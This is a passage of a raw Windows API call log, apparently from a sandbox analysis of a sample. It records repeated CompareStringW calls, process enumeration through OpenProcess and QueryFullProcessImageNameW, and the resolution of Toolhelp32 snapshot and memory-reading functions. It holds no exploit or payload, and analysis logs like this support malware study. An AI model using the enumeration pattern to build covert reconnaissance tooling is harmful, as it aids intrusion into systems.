cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="584", cchCount2=3) returned 2 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="584", cchCount2=3) returned 2 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="584", cchCount2=3) returned 2 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="652", cchCount1=3, lpString2="652", cchCount2=3) returned 2 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="652", cchCount1=3, lpString2="652", cchCount2=3) returned 2 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="652", cchCount1=3, lpString2="652", cchCount2=3) returned 2 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="652", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="652", cchCount1=3, lpString2="652", cchCount2=3) returned 2 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="652", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="704", cchCount1=3, lpString2="704", cchCount2=3) returned 2 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="704", cchCount2=3) returned 1 [0288.980] GetPriorityClass (hProcess=0x0) returned 0x0 [0288.980] CloseHandle (hObject=0x0) returned 0 [0288.980] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x18fcc8 | out: lpCPInfo=0x18fcc8) returned 1 [0288.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\cmd.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0288.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\cmd.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0288.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\cmd.exe", cchWideChar=27, lpMultiByteStr=0x9d92a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\cmd.exe", lpUsedDefaultChar=0x0) returned 27 [0288.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0288.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0288.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0288.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.981] GetPriorityClass (hProcess=0x0) returned 0x0 [0288.981] CloseHandle (hObject=0x0) returned 0 [0288.981] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x170 [0288.981] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="", lpdwSize=0x18fd44) returned 0 [0289.095] CloseHandle (hObject=0x170) returned 1 [0289.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\cmd.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0289.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\cmd.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0289.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\cmd.exe", cchWideChar=27, lpMultiByteStr=0x9d92a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\cmd.exe", lpUsedDefaultChar=0x0) returned 27 [0289.095] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x170 [0289.095] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="", lpdwSize=0x18fd48) returned 0 [0289.097] CloseHandle (hObject=0x170) returned 1 [0289.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.098] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x170 [0289.098] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="I", lpdwSize=0x18fd40) returned 0 [0289.100] CloseHandle (hObject=0x170) returned 1 [0289.100] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x170 [0289.100] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="", lpdwSize=0x18fd48) returned 0 [0289.102] CloseHandle (hObject=0x170) returned 1 [0289.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x170 [0289.102] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.102] CloseHandle (hObject=0x170) returned 1 [0289.102] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x108) returned 0x170 [0289.102] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\smss.exe", lpdwSize=0x18fd44) returned 1 [0289.105] CloseHandle (hObject=0x170) returned 1 [0289.105] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0289.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x9e07dc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0289.106] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x9c472c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0289.106] GetProcAddress (hModule=0x769b0000, lpProcName="Heap32ListFirst") returned 0x76a45bc1 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x9c472c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0289.106] GetProcAddress (hModule=0x769b0000, lpProcName="Heap32ListNext") returned 0x76a45c6b [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x9c472c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0289.106] GetProcAddress (hModule=0x769b0000, lpProcName="Heap32First") returned 0x76a45d03 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0289.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x9c472c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0289.107] GetProcAddress (hModule=0x769b0000, lpProcName="Heap32Next") returned 0x76a45eee [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x9e07dc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0289.107] GetProcAddress (hModule=0x769b0000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x76a460f3 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x9c472c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0289.107] GetProcAddress (hModule=0x769b0000, lpProcName="Process32First") returned 0x769e8abb [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x9c472c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0289.107] GetProcAddress (hModule=0x769b0000, lpProcName="Process32Next") returned 0x769e8812 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x9c472c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0289.107] GetProcAddress (hModule=0x769b0000, lpProcName="Process32FirstW") returned 0x769e8b83 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x9c472c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0289.107] GetProcAddress (hModule=0x769b0000, lpProcName="Process32NextW") returned 0x769e88da [0289.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x9c472c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0289.108] GetProcAddress (hModule=0x769b0000, lpProcName="Process32FirstW") returned 0x769e8b83 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x9c472c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0289.108] GetProcAddress (hModule=0x769b0000, lpProcName="Process32NextW") returned 0x769e88da [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x9c472c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0289.108] GetProcAddress (hModule=0x769b0000, lpProcName="Thread32First") returned 0x76a46133 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x9c472c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0289.108] GetProcAddress (hModule=0x769b0000, lpProcName="Thread32Next") returned 0x76a461df [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x9c472c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0289.108] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0289.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x9c472c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0289.108] GetProcAddress (hModule=0x769b0000, lpProcName="Module32Next") returned 0x76a46362 